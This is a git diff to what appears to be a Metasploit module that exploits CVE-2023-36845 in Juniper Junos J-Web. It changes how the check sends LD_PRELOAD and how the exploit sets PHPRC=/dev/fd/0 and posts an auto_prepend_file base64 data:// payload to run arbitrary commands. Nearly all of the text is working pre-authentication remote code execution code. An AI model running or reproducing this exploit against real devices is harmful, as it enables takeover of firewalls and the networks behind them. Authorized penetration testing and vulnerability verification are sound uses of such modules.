diff --git a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb index d68284285e18..d2f328e7e18c 100644 --- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb +++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb @@ -31,6 +31,7 @@ def initialize(info = {}) 'Ron Bowes' # Target setup instructions ], 'References' => [ + [ 'URL', 'https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/'], [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'], [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'], [ 'CVE', '2023-36845'] @@ -55,9 +56,10 @@ def initialize(info = {}) def check res = send_request_cgi( - 'uri' => normalize_uri(target_uri.path, '?LD_PRELOAD=/tmp/ld'), + 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', - 'ctype' => 'application/x-www-form-urlencoded' + 'ctype' => 'application/x-www-form-urlencoded', + 'data' => 'LD_PRELOAD=/tmp/ld' ) return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?('Cannot open "/tmp/ld"') @@ -70,10 +72,13 @@ def execute_command(cmd, _opts = {}) post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(cmd)}\"" res = send_request_cgi( - 'uri' => normalize_uri(target_uri.path, '?PHPRC=/dev/fd/0'), + 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', 'data' => post_data.to_s, - 'ctype' => 'application/x-www-form-urlencoded' + 'ctype' => 'application/x-www-form-urlencoded', + 'vars_get' => { + 'PHPRC' => '/dev/fd/0' + } ) print_error('The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res